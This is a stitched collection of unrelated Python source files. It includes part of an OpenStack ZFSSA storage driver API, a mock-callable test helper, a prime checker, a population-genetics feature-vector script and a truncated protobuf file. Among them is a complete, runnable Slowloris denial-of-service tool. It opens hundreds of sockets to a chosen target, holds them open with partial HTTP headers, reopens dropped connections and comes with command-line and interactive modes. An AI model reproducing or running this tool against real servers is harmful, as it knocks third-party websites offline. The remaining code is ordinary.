msg = _('Error getting initiator groups.')
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
val = json.loads(ret.data)
for initiator_group in val['groups']:
if initiator in initiator_group['initiators']:
groups.append(initiator_group["name"])
if len(groups) == 0:
LOG.debug("Initiator group not found. Attaching volume to "
"default initiator group.")
groups.append('default')
return groups
class ZFSSANfsApi(ZFSSAApi):
"""ZFSSA API proxy class for NFS driver"""
projects_path = '/api/storage/v1/pools/%s/projects'
project_path = projects_path + '/%s'
shares_path = project_path + '/filesystems'
share_path = shares_path + '/%s'
share_snapshots_path = share_path + '/snapshots'
share_snapshot_path = share_snapshots_path + '/%s'
services_path = '/api/service/v1/services/'
def __init__(self, *args, **kwargs):
super(ZFSSANfsApi, self).__init__(*args, **kwargs)
self.webdavclient = None
def set_webdav(self, https_path, auth_str):
self.webdavclient = webdavclient.ZFSSAWebDAVClient(https_path,
auth_str)
def verify_share(self, pool, project, share):
"""Checks whether the share exists"""
svc = self.share_path % (pool, project, share)
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
exception_msg = (_('Error Verifying '
'share: %(share)s on '
'Project: %(project)s and '
'Pool: %(pool)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'share': share,
'project': project,
'pool': pool,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def create_snapshot(self, pool, project, share, snapshot):
"""create snapshot of a share"""
svc = self.share_snapshots_path % (pool, project, share)
arg = {
'name': snapshot
}
ret = self.rclient.post(svc, arg)
if ret.status != restclient.Status.CREATED:
exception_msg = (_('Error Creating '
'Snapshot: %(snapshot)s on'
'share: %(share)s to '
'Pool: %(pool)s '
'Project: %(project)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'snapshot': snapshot,
'share': share,
'pool': pool,
'project': project,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def delete_snapshot(self, pool, project, share, snapshot):
"""delete snapshot of a share"""
svc = self.share_snapshot_path % (pool, project, share, snapshot)
ret = self.rclient.delete(svc)
if ret.status != restclient.Status.NO_CONTENT:
exception_msg = (_('Error Deleting '
'Snapshot: %(snapshot)s on '
'Share: %(share)s to '
'Pool: %(pool)s '
'Project: %(project)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'snapshot': snapshot,
'share': share,
'pool': pool,
'project': project,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def create_snapshot_of_volume_file(self, src_file="", dst_file=""):
src_file = '.zfs/snapshot/' + src_file
return self.webdavclient.request(src_file=src_file, dst_file=dst_file,
method='COPY')
def delete_snapshot_of_volume_file(self, src_file=""):
return self.webdavclient.request(src_file=src_file, method='DELETE')
def create_volume_from_snapshot_file(self, src_file="", dst_file="",
method='COPY'):
return self.webdavclient.request(src_file=src_file, dst_file=dst_file,
method=method)
def _change_service_state(self, service, state=''):
svc = self.services_path + service + '/' + state
ret = self.rclient.put(svc)
if ret.status != restclient.Status.ACCEPTED:
exception_msg = (_('Error Verifying '
'Service: %(service)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'service': service,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
data = json.loads(ret.data)['service']
LOG.debug('%(service)s service state: %(data)s',
{'service': service, 'data': data})
status = 'online' if state == 'enable' else 'disabled'
if data['<status>'] != status:
exception_msg = (_('%(service)s Service is not %(status)s '
'on storage appliance: %(host)s')
% {'service': service,
'status': status,
'host': self.host})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def enable_service(self, service):
self._change_service_state(service, state='enable')
self.verify_service(service)
def disable_service(self, service):
self._change_service_state(service, state='disable')
self.verify_service(service, status='offline')
def verify_service(self, service, status='online'):
"""Checks whether a service is online or not"""
svc = self.services_path + service
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
exception_msg = (_('Error Verifying '
'Service: %(service)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'service': service,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
data = json.loads(ret.data)['service']
if data['<status>'] != status:
exception_msg = (_('%(service)s Service is not %(status)s '
'on storage appliance: %(host)s')
% {'service': service,
'status': status,
'host': self.host})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def modify_service(self, service, edit_args=None):
"""Edit service properties"""
if edit_args is None:
edit_args = {}
svc = self.services_path + service
ret = self.rclient.put(svc, edit_args)
if ret.status != restclient.Status.ACCEPTED:
exception_msg = (_('Error modifying '
'Service: %(service)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'service': service,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
data = json.loads(ret.data)['service']
LOG.debug('Modify %(service)s service '
'return data: %(data)s',
{'service': service,
'data': data})
def create_share(self, pool, project, share, args):
"""Create a share in the specified pool and project"""
svc = self.share_path % (pool, project, share)
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
svc = self.shares_path % (pool, project)
args.update({'name': share})
ret = self.rclient.post(svc, args)
if ret.status != restclient.Status.CREATED:
exception_msg = (_('Error Creating '
'Share: %(name)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'name': share,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
else:
LOG.debug('Editing properties of a pre-existing share')
ret = self.rclient.put(svc, args)
if ret.status != restclient.Status.ACCEPTED:
exception_msg = (_('Error editing share: '
'%(share)s on '
'Pool: %(pool)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s .')
% {'share': share,
'pool': pool,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def get_share(self, pool, project, share):
"""return share properties"""
svc = self.share_path % (pool, project, share)
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
exception_msg = (_('Error Getting '
'Share: %(share)s on '
'Pool: %(pool)s '
'Project: %(project)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'share': share,
'pool': pool,
'project': project,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
val = json.loads(ret.data)
return val['filesystem']
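# --- Illustrative usage sketch (not part of the driver; names and values are
# hypothetical). A typical call sequence used by the iSCSI driver: point the
# proxy at an appliance, log in, then verify/create storage objects. The auth
# string format is whatever restclient.RestClientURL.login expects (not shown here).
#
#     api = ZFSSAApi()
#     api.set_host('zfssa.example.com', timeout=60)
#     api.login(auth_str)
#     api.verify_pool('mypool')
#     api.create_project('mypool', 'cinder-project', compression='lzjb')
#     avail, total = api.get_pool_stats('mypool')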
|
python
|
"""This module provides a mock callable class."""
from __future__ import annotations
import queue
import unittest.mock
from typing import Any, Dict, NamedTuple, Optional, Tuple
from .consumer import ConsumerAsserter, MockConsumerGroup
class MockCallableGroup:
"""This class implements a group of callables."""
class _CallableInfo(NamedTuple):
name: str
args: Tuple
kwargs: Dict[str, Any]
def __init__(
self: MockCallableGroup,
*callables: str,
timeout: Optional[float] = 1.0,
) -> None:
"""
Initialise a new instance.
:param timeout: number of seconds to wait for the callable to be
called, or None to wait forever. The default is 1.0 seconds.
:param callables: names of callables in this group.
"""
self._queue: queue.SimpleQueue[
MockCallableGroup._CallableInfo
] = queue.SimpleQueue()
characterizers = {category: None for category in callables}
self._mock_consumer_group = MockConsumerGroup(
lambda timeout: self._queue.get(timeout=timeout),
lambda callable_info: callable_info.name,
timeout,
**characterizers,
)
self._callables = {
name: self._Callable(
self._queue, name, self._mock_consumer_group[name]
)
for name in callables
}
def __getitem__(
self: MockCallableGroup,
callable_name: str,
) -> MockCallableGroup._Callable:
"""
Return a standalone callable for the specified callable_name.
This can be passed to the caller to be actually called, and it
can also be used to assert calls.
:param callable_name: name of the callable sought.
:return: a standalone mock callable
"""
return self._callables[callable_name]
def assert_call(
self: MockCallableGroup,
callable_name: str,
*args: Any,
**kwargs: Any,
) -> None:
"""
Assert that the specified callable has been called as specified.
:param callable_name: name of the callable that we are asserting
to have been called
:param args: positional arguments asserted to be in the call
:param kwargs: keyword arguments. An optional "lookahead"
keyword argument may be used to specify the number of calls
            to examine in search of a matching call. The default is 1,
            which means we are asserting on the *next* call. All other
keyword arguments are part of the asserted call.
:raises AssertionError: if the asserted call has not occurred
within the timeout period
"""
lookahead = kwargs.pop("lookahead", 1)
try:
self._mock_consumer_group.assert_item(
(callable_name, args, kwargs), lookahead=lookahead
)
except AssertionError as assertion_error:
raise AssertionError(
f"Callable has not been called with args {args}, kwargs "
f"{kwargs}."
) from assertion_error
def assert_not_called(self: MockCallableGroup) -> None:
"""
Assert that no callable in this group has been called.
:raises AssertionError: if one of the callables in this group
has been called.
"""
try:
self._mock_consumer_group.assert_no_item()
except AssertionError as assertion_error:
raise AssertionError(
"Callable has been called."
) from assertion_error
class _Callable:
"""A view on a single callable."""
def __init__(
self: MockCallableGroup._Callable,
call_queue: queue.SimpleQueue,
name: str,
consumer_view: ConsumerAsserter,
) -> None:
"""
Initialise a new instance.
:param call_queue: the queue in which calls are places
:param name: the name of this callable
:param consumer_view: the underlying view on the consumer
"""
self._call_queue = call_queue
self._name = name
self._consumer_view = consumer_view
self._mock_configuration: Dict[str, Any] = {}
def configure_mock(self, **configuration: Any) -> None:
"""
Configure the underlying mock.
:param configuration: keyword arguments to be passed to the
underlying mock.
"""
self._mock_configuration = configuration
def __call__(
self: MockCallableGroup._Callable, *args: Any, **kwargs: Any
) -> Any:
"""
Register a call on this callable.
:param args: positional arguments in the call
:param kwargs: keyword arguments in the call
:return: whatever this callable is configured to return
"""
self._call_queue.put(
MockCallableGroup._CallableInfo(self._name, args, kwargs)
)
            mock = unittest.mock.Mock(**self._mock_configuration)
return mock(*args, **kwargs)
def assert_call(
self: MockCallableGroup._Callable,
*args: Any,
**kwargs: Any,
) -> None:
"""
Assert that this callable has been called as specified.
:param args: positional arguments asserted to be in the call
:param kwargs: keyword arguments. An optional "lookahead"
keyword argument may be used to specify the number of
calls to examine in search of a matching call. The
default is 1, which means we are asserting on the *next*
                call. All other keyword arguments are part of the
asserted call.
:raises AssertionError: if the asserted call has not
occurred within the timeout period
"""
lookahead = kwargs.pop("lookahead", 1)
try:
self._consumer_view.assert_item(
(self._name, args, kwargs), lookahead=lookahead
)
except AssertionError as assertion_error:
raise AssertionError(
f"Callable has not been called with args {args}, kwargs "
f"{kwargs}."
) from assertion_error
def assert_not_called(self: MockCallableGroup._Callable) -> None:
"""
Assert that this callable has not been called.
:raises AssertionError: if this callable has been called.
"""
try:
self._consumer_view.assert_no_item()
except AssertionError as assertion_error:
raise AssertionError(
"Callable has been called."
) from assertion_error
class MockCallable:
"""A class for a single mock callable."""
def __init__(self: MockCallable, timeout: Optional[float] = 1.0) -> None:
"""
Initialise a new instance.
:param timeout: how long to wait for the call, in seconds, or
None to wait forever. The default is 1 second.
"""
name = "__mock_callable"
self._view = MockCallableGroup(name, timeout=timeout)[name]
def configure_mock(self: MockCallable, **configuration: Any) -> None:
"""
Configure the underlying mock.
:param configuration: keyword arguments to be passed to the
underlying mock.
"""
self._view.configure_mock(**configuration)
def assert_call(
self: MockCallable,
*args: Any,
**kwargs: Any,
) -> None:
"""
Assert that this callable has been called as specified.
:param args: positional arguments asserted to be in the call
:param kwargs: keyword arguments. An optional "lookahead"
keyword argument may be used to specify the number of calls
            to examine in search of a matching call. The default is 1,
            which means we are asserting on the *next* call. All other
keyword arguments are part of the asserted call.
:raises AssertionError: if the asserted call has not
occurred within the timeout period
"""
try:
self._view.assert_call(*args, **kwargs)
except AssertionError:
raise
def assert_not_called(self: MockCallable) -> None:
"""
Assert that this callable has not been called.
:raises AssertionError: if this callable has been called.
"""
try:
self._view.assert_not_called()
except AssertionError:
raise
def __call__(self: MockCallable, *args: Any, **kwargs: Any) -> Any:
"""
Register a call on this callable.
:param args: positional arguments in the call
:param kwargs: keyword arguments in the call
:return: whatever this callable is configured to return
"""
return self._view(*args, **kwargs)
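# Illustrative usage sketch (not part of the original module); the callable
# names below are examples. The group's standalone callables are handed to the
# code under test, then calls are asserted on within the timeout.
if __name__ == "__main__":
    group = MockCallableGroup("status_callback", "result_callback", timeout=1.0)

    # Code under test would invoke the callable like this:
    group["status_callback"]("IN_PROGRESS", percent=50)

    # The test then asserts on the received calls.
    group.assert_call("status_callback", "IN_PROGRESS", percent=50)
    group["result_callback"].assert_not_called()

    single = MockCallable(timeout=1.0)
    single("done")
    single.assert_call("done")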
|
python
|
# Is Prime
# determine whether the number is prime or not
class isPrime:
def isPrime(self, n):
        if n < 2:
            return False
        i = 2
while i * i <= n:
if n % i == 0:
return False
i += 1
return True
ip = isPrime()
print(ip.isPrime(5))
|
python
|
#!/bin/env python
import platform, socket, random, time
_appname_="slowloris"
_version_="0.1"
_description_="fastly take down the web"
_author_="blackc8"
ncol ="\033[0m"
bold ="\033[1m"
dim ="\033[2m"
uline ="\033[4m"
reverse="\033[7m"
red ="\033[31m"
green ="\033[32m"
yellow ="\033[33m"
blue ="\033[34m"
purple ="\033[35m"
cyan ="\033[36m"
white ="\033[37m"
if platform.system() == "Windows":
ncol=bold=dim=uline=red=green=yellow=blue=purple=cyan=white=''
def inf(msg,enD="\n"):
print(dim+blue+"[i] "+ncol+bold+blue+msg+ncol,end=enD,flush=True)
def scs(msg,enD="\n"):
print(dim+green+"[+] "+ncol+bold+white+msg+ncol,end=enD,flush=True)
def err(msg,enD="\n"):
print(dim+red+"[-] "+ncol+bold+red+msg+ncol,end=enD)
def wrn(msg):
print(dim+red+"[!] "+ncol+bold+red+msg+ncol)
def ask(msg):
inp=input(purple+dim+"[?] "+ncol+bold+purple+msg+white)
print(ncol,end='')
return inp
def eint(str):
intgr = []
for char in str:
if char.isdigit():
intgr.append(char)
return int("".join(intgr))
def inp(msg,default='',type='str',show=True):
inp=input(bold+green+msg+white)
if inp == "": inp=str(default)
if type == 'int': inp=eint(inp)
if show: print(bold+blue+" ==> "+ncol+str(inp))
return inp
def Eexit(msg):
err(msg)
exit()
min_banner=bold+purple+_appname_+white+"("+green+_version_+white+")["+blue+"blackc8"+white+"]"
# default config
headers = [
"User-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36",
"Accept-language: en-US,en"
]
sockets = []
hostname = ""
host_info = ""
def resolve_hostname(hostname):
try:
IPaddr=socket.gethostbyname(hostname)
return IPaddr
except socket.error:
return 0
def validIP(address):
parts = address.split(".")
if len(parts) != 4:
return False
for item in parts:
if not 0 <= int(item) <= 255:
return False
return True
def is_open(host,port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(0.5)
con = sock.connect_ex((host,port))
sock.close()
return con
def openSocket(host,port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(4)
sock.connect((host,port)) # connect to host
sock.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 1337)).encode("utf-8"))
# send headers
for header in headers:
sock.send("{}\r\n".format(header).encode("utf-8"))
return sock # return socket for later use
def checkHost(host,port):
print("")
scs(white+"Checking host...",enD='')
# resolve and check ip address
if not validIP(host):
hostIP=resolve_hostname(host)
if hostIP == 0:
print(bold+red+"error")
Eexit("Unable to resolve hostname ({})")
else:
hostname=host
host=hostIP
# check host is up and port is open
port_stat=is_open(host,port)
if port_stat != 0:
print(bold+red+"error")
if port_stat == 11:
Eexit("target "+host+" is down!")
if port_stat == 111:
Eexit("target up, but port "+str(port)+" is closed!")
print(bold+green+"OK")
return host
def attack(host,port,Nsocks,delay):
print(bold+blue+reverse+"Starting DoS attack"+ncol)
print(bold+green+" Target ==> "+white+host+":"+str(port)+ncol)
# open Nsocks no. of sockets to port
scs("Opening {} sockets on target...".format(Nsocks),enD='')
for _ in range(Nsocks):
try:
# open socket
sock = openSocket(host,port)
except socket.error:
break
sockets.append(sock) # add socket to array for later use
print(bold+green+"done")
    # keep these sockets alive
while True:
scs("Sending headers to connected sockets...",enD='')
for sock in list(sockets):
try:
sock.send("X-a: {}\r\n".format(random.randint(1, 4600)).encode("utf-8"))
except socket.error:
sockets.remove(sock)
print(bold+green+"done")
if Nsocks - len(sockets) > 0:
# reopen closed sockets
scs("Reopening closed sockets...",enD='')
for _ in range(Nsocks - len(sockets)):
try:
# reopen socket
sock = openSocket(host,port)
except socket.error:
break
except:
print(bold+red+"error")
sockets.append(sock) # add the new socket to array
print(bold+green+"done")
inf("Wating {}s.".format(delay))
time.sleep(delay)
def interactive_mode():
big_banner=purple+bold+"""\t _ _ _
\t ___| | _____ _| | ___ _ __(_)___
\t/ __| |/ _ \ \ /\ / / |/ _ \| '__| / __|
\t\__ \ | (_) \ V V /| | (_) | | | \__ \\
\t|___/_|\___/ \_/\_/ |_|\___/|_| |_|___/"""+green+"("+white+_version_+green+")"+red+"\n\n\t\t[ "+_description_+" ]"+white+"\n\t\t © Copyright 2020 blackc8"+white+"\n"
print(big_banner)
print("\t\t "+cyan+"(Interactive Mode)"+ncol)
target=inp("target: ",default="127.0.0.1")
port=inp("port: ",default=80,type='int')
Nsocks=inp("Number of socket: ",default=300,type='int')
delay=inp("delay: ",default=15,type='int')
host=checkHost(target,port)
attack(host,port,Nsocks,delay)
if __name__ == "__main__":
import argparse, sys
parser = argparse.ArgumentParser(description=_description_,epilog="Author: "+_author_)
parser.add_argument("-t","--target",type=str,help="hostname/IP of target")
parser.add_argument("-p","--port",type=int,help="specficy port to attack, default=80",default=80)
parser.add_argument("-s","--sockets",type=int,help="specify number of sockets to open, deafult=300",default=300)
parser.add_argument("-d","--delay",type=int,help="specify delay between packet sending, default=10",default=10)
parser.add_argument("-i","--interactive",help="launch the interactive mode",action="store_true")
args=parser.parse_args()
if args.interactive or len(sys.argv) <= 1:
try:
interactive_mode()
except KeyboardInterrupt:
err("Exting due to Keyboard Interrupt")
exit()
if not args.target:
err("No target specified.Try option -h")
exit()
try:
print(min_banner)
attack(args.target,args.port,args.sockets,args.delay)
except KeyboardInterrupt:
err("Exting due to Keyboard Interrupt")
exit()
|
python
|
import sys, os
import allel
import random
import numpy as np
from diploshic.msTools import *
from diploshic.fvTools import *
import time
(
trainingDataFileName,
totalPhysLen,
numSubWins,
maskFileName,
vcfForMaskFileName,
popForMask,
sampleToPopFileName,
unmaskedGenoFracCutoff,
chrArmsForMasking,
unmaskedFracCutoff,
outStatsDir,
fvecFileName,
) = sys.argv[1:]
totalPhysLen = int(totalPhysLen)
numSubWins = int(numSubWins)
subWinLen = totalPhysLen // numSubWins
assert totalPhysLen % numSubWins == 0 and numSubWins > 1
sys.stderr.write("file name='%s'" % (trainingDataFileName))
(
trainingDataFileObj,
sampleSize,
numInstances,
) = openMsOutFileForSequentialReading(trainingDataFileName)
if maskFileName.lower() in ["none", "false"]:
sys.stderr.write(
"maskFileName='%s': not masking any sites!\n" % (maskFileName)
)
maskFileName = False
unmaskedFracCutoff = 1.0
else:
chrArmsForMasking = chrArmsForMasking.split(",")
unmaskedFracCutoff = float(unmaskedFracCutoff)
if unmaskedFracCutoff > 1.0 or unmaskedFracCutoff < 0.0:
sys.exit(
"unmaskedFracCutoff must lie within [0, 1]. AAARRRRGGGGHHHHH!!!!\n"
)
if vcfForMaskFileName.lower() in ["none", "false"]:
sys.stderr.write(
"vcfForMaskFileName='%s': not masking any genotypes!\n"
% (vcfForMaskFileName)
)
vcfForMaskFileName = False
else:
if not maskFileName:
sys.exit(
"Cannot mask genotypes without also supplying a file for masking entire sites (can use reference genome with Ns if desired). AAARRRGHHHHH!!!!!!\n"
)
if sampleToPopFileName.lower() in [
"none",
"false",
] or popForMask.lower() in [
"none",
"false",
]:
sampleToPopFileName = None
sys.stderr.write(
"No sampleToPopFileName specified. Using all individuals for masking genotypes.\n"
)
unmaskedGenoFracCutoff = float(unmaskedGenoFracCutoff)
if unmaskedGenoFracCutoff > 1.0 or unmaskedGenoFracCutoff < 0.0:
sys.exit(
"unmaskedGenoFracCutoff must lie within [0, 1]. AAARRRRGGGGHHHHH!!!!\n"
)
def getSubWinBounds(subWinLen, totalPhysLen): # get inclusive subwin bounds
subWinStart = 1
subWinEnd = subWinStart + subWinLen - 1
subWinBounds = [(subWinStart, subWinEnd)]
numSubWins = totalPhysLen // subWinLen
for i in range(1, numSubWins - 1):
subWinStart += subWinLen
subWinEnd += subWinLen
subWinBounds.append((subWinStart, subWinEnd))
subWinStart += subWinLen
# if our subwindows are 1 bp too short due to rounding error, the last window picks up all of the slack
subWinEnd = totalPhysLen
subWinBounds.append((subWinStart, subWinEnd))
return subWinBounds
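# Illustrative example (not executed): getSubWinBounds(100, 1000) returns
# [(1, 100), (101, 200), ..., (901, 1000)], i.e. inclusive 1-based subwindow bounds.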
if not maskFileName:
unmasked = [True] * totalPhysLen
else:
drawWithReplacement = False
sys.stderr.write("reading masking data...")
maskData = readMaskDataForTraining(
maskFileName,
totalPhysLen,
subWinLen,
chrArmsForMasking,
shuffle=True,
cutoff=unmaskedFracCutoff,
genoCutoff=unmaskedGenoFracCutoff,
vcfForMaskFileName=vcfForMaskFileName,
pop=popForMask,
sampleToPopFileName=sampleToPopFileName,
)
if vcfForMaskFileName:
maskData, genoMaskData = maskData
else:
genoMaskData = [None] * len(maskData)
sys.stderr.write("done!\n")
if len(maskData) < numInstances:
sys.stderr.write(
"Warning: didn't get enough windows from masked data (needed %d; got %d); will draw with replacement!!\n"
% (numInstances, len(maskData))
)
drawWithReplacement = True
else:
sys.stderr.write(
"Got enough windows from masked data (needed %d; got %d); will draw without replacement.\n"
% (numInstances, len(maskData))
)
def getSnpIndicesInSubWins(subWinBounds, snpLocs):
snpIndicesInSubWins = []
for subWinIndex in range(len(subWinBounds)):
snpIndicesInSubWins.append([])
subWinIndex = 0
for i in range(len(snpLocs)):
while not (
snpLocs[i] >= subWinBounds[subWinIndex][0]
and snpLocs[i] <= subWinBounds[subWinIndex][1]
):
subWinIndex += 1
snpIndicesInSubWins[subWinIndex].append(i)
return snpIndicesInSubWins
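# Illustrative example (not executed): with subWinBounds=[(1, 100), (101, 200)]
# and snpLocs=[5, 99, 150], this returns [[0, 1], [2]] -- SNP indices grouped by
# the subwindow that contains them.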
subWinBounds = getSubWinBounds(subWinLen, totalPhysLen)
# statNames = ["pi", "thetaW", "tajD", "nDiplos","diplo_H2","diplo_H12","diplo_H2/H1","diplo_ZnS","diplo_Omega"]
statNames = [
"pi",
"thetaW",
"tajD",
"distVar",
"distSkew",
"distKurt",
"nDiplos",
"diplo_H1",
"diplo_H12",
"diplo_H2/H1",
"diplo_ZnS",
"diplo_Omega",
]
header = []
for statName in statNames:
for i in range(numSubWins):
header.append("%s_win%d" % (statName, i))
header = "\t".join(header)
statVals = {}
for statName in statNames:
statVals[statName] = []
start = time.perf_counter()
numInstancesDone = 0
sys.stderr.write("ready to process sim reps. here we go!\n")
for instanceIndex in range(numInstances):
sys.stderr.write("starting rep %d of %d\n" % (instanceIndex, numInstances))
hapArrayIn, positionArray = readNextMsRepToHaplotypeArrayIn(
trainingDataFileObj, sampleSize, totalPhysLen
)
haps = allel.HaplotypeArray(hapArrayIn, dtype="i1")
if maskFileName:
if drawWithReplacement:
randIndex = random.randint(0, len(maskData) - 1)
unmasked, genoMasks = maskData[randIndex], genoMaskData[randIndex]
else:
unmasked, genoMasks = (
maskData[instanceIndex],
genoMaskData[instanceIndex],
)
assert len(unmasked) == totalPhysLen
if haps.shape[1] % 2 == 1:
haps = haps[:, :-1]
genos = haps.to_genotypes(ploidy=2)
unmaskedSnpIndices = [
i for i in range(len(positionArray)) if unmasked[positionArray[i] - 1]
]
if len(unmaskedSnpIndices) == 0:
sys.stderr.write("no snps for rep %d\n" % (instanceIndex))
for statName in statNames:
statVals[statName].append([])
for subWinIndex in range(numSubWins):
for statName in statNames:
appendStatValsForMonomorphic(
statName, statVals, instanceIndex, subWinIndex
)
else:
sys.stderr.write("processing snps for rep %d\n" % (instanceIndex))
if maskFileName:
preMaskCount = np.sum(genos.count_alleles())
if genoMasks:
sys.stderr.write(
"%d snps in the masking window for rep %d\n"
% (len(genoMasks), instanceIndex)
)
genos = maskGenos(
genos.subset(sel0=unmaskedSnpIndices), genoMasks
)
else:
genos = genos.subset(sel0=unmaskedSnpIndices)
alleleCountsUnmaskedOnly = genos.count_alleles()
maskedCount = preMaskCount - np.sum(alleleCountsUnmaskedOnly)
sys.stderr.write(
"%d of %d genotypes (%.2f%%) masked for rep %d\n"
% (
maskedCount,
preMaskCount,
100 * maskedCount / preMaskCount,
instanceIndex,
)
)
else:
alleleCountsUnmaskedOnly = genos.count_alleles()
positionArrayUnmaskedOnly = [
positionArray[i] for i in unmaskedSnpIndices
]
snpIndicesInSubWins = getSnpIndicesInSubWins(
subWinBounds, positionArrayUnmaskedOnly
)
for statName in statNames:
statVals[statName].append([])
for subWinIndex in range(numSubWins):
subWinStart, subWinEnd = subWinBounds[subWinIndex]
unmaskedFrac = unmasked[subWinStart - 1 : subWinEnd].count(
True
) / float(subWinLen)
assert unmaskedFrac >= unmaskedFracCutoff
snpIndicesInSubWinUnmasked = snpIndicesInSubWins[subWinIndex]
sys.stderr.write(
"examining subwindow %d which has %d unmasked SNPs\n"
% (subWinIndex, len(snpIndicesInSubWinUnmasked))
)
if len(snpIndicesInSubWinUnmasked) > 0:
genosInSubWin = genos.subset(sel0=snpIndicesInSubWinUnmasked)
for statName in statNames:
calcAndAppendStatValDiplo(
alleleCountsUnmaskedOnly,
positionArrayUnmaskedOnly,
statName,
subWinStart,
subWinEnd,
statVals,
instanceIndex,
subWinIndex,
genosInSubWin,
unmasked,
)
else:
for statName in statNames:
appendStatValsForMonomorphic(
statName, statVals, instanceIndex, subWinIndex
)
numInstancesDone += 1
sys.stderr.write(
"finished %d reps after %f seconds\n"
% (numInstancesDone, time.perf_counter() - start)
)
if numInstancesDone != numInstances:
sys.exit(
"Expected %d reps but only processed %d. Perhaps we are using malformed simulation output!\n"
        % (numInstances, numInstancesDone)
)
statFiles = []
if outStatsDir.lower() != "none":
for subWinIndex in range(numSubWins):
statFileName = "%s/%s.%d.stats" % (
outStatsDir,
trainingDataFileName.split("/")[-1].rstrip(".gz"),
subWinIndex,
)
statFiles.append(open(statFileName, "w"))
statFiles[-1].write("\t".join(statNames) + "\n")
with open(fvecFileName, "w") as fvecFile:
fvecFile.write(header + "\n")
for i in range(numInstancesDone):
statLines = []
for subWinIndex in range(numSubWins):
statLines.append([])
outVec = []
for statName in statNames:
outVec += normalizeFeatureVec(statVals[statName][i])
for subWinIndex in range(numSubWins):
statLines[subWinIndex].append(
statVals[statName][i][subWinIndex]
)
if statFiles:
for subWinIndex in range(numSubWins):
statFiles[subWinIndex].write(
"\t".join([str(x) for x in statLines[subWinIndex]]) + "\n"
)
fvecFile.write("\t".join([str(x) for x in outVec]) + "\n")
if statFiles:
for subWinIndex in range(numSubWins):
statFiles[subWinIndex].close()
sys.stderr.write(
"total time spent calculating summary statistics and generating feature vectors: %f secs\n"
% (time.perf_counter() - start)
)
closeMsOutFile(trainingDataFileObj)
|
python
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: second/protos/train.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from second.protos import optimizer_pb2 as second_dot_protos_dot_optimizer__pb2
from second.protos import preprocess_pb2 as second_dot_protos_dot_preprocess__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='second/protos/train.proto',
package='second.protos',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n\x19second/protos/train.proto\x12\rsecond.protos\x1a\x1dsecond/protos/optimizer.proto\x1a\x1esecond/protos/preprocess.proto\"\xfa\x01\n\x0bTrainConfig\x12+\n\toptimizer\x18\x01 \x01(\x0b\x32\x18.second.protos.Optimizer\x12\r\n\x05steps\x18\x02 \x01(\r\x12\x16\n\x0esteps_per_eval\x18\x03 \x01(\r\x12\x1d\n\x15save_checkpoints_secs\x18\x04 \x01(\r\x12\x1a\n\x12save_summary_steps\x18\x05 \x01(\r\x12\x1e\n\x16\x65nable_mixed_precision\x18\x06 \x01(\x08\x12\x19\n\x11loss_scale_factor\x18\x07 \x01(\x02\x12!\n\x19\x63lear_metrics_every_epoch\x18\x08 \x01(\x08\x62\x06proto3')
,
dependencies=[second_dot_protos_dot_optimizer__pb2.DESCRIPTOR,second_dot_protos_dot_preprocess__pb2.DESCRIPTOR,])
_TRAINCONFIG = _descriptor.Descriptor(
name='TrainConfig',
full_name='second.protos.TrainConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='optimizer', full_name='second.protos.TrainConfig.optimizer', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='steps', full_name='second.protos.TrainConfig.steps', index=1,
number=2, type=13, cpp_type=3, label=1,
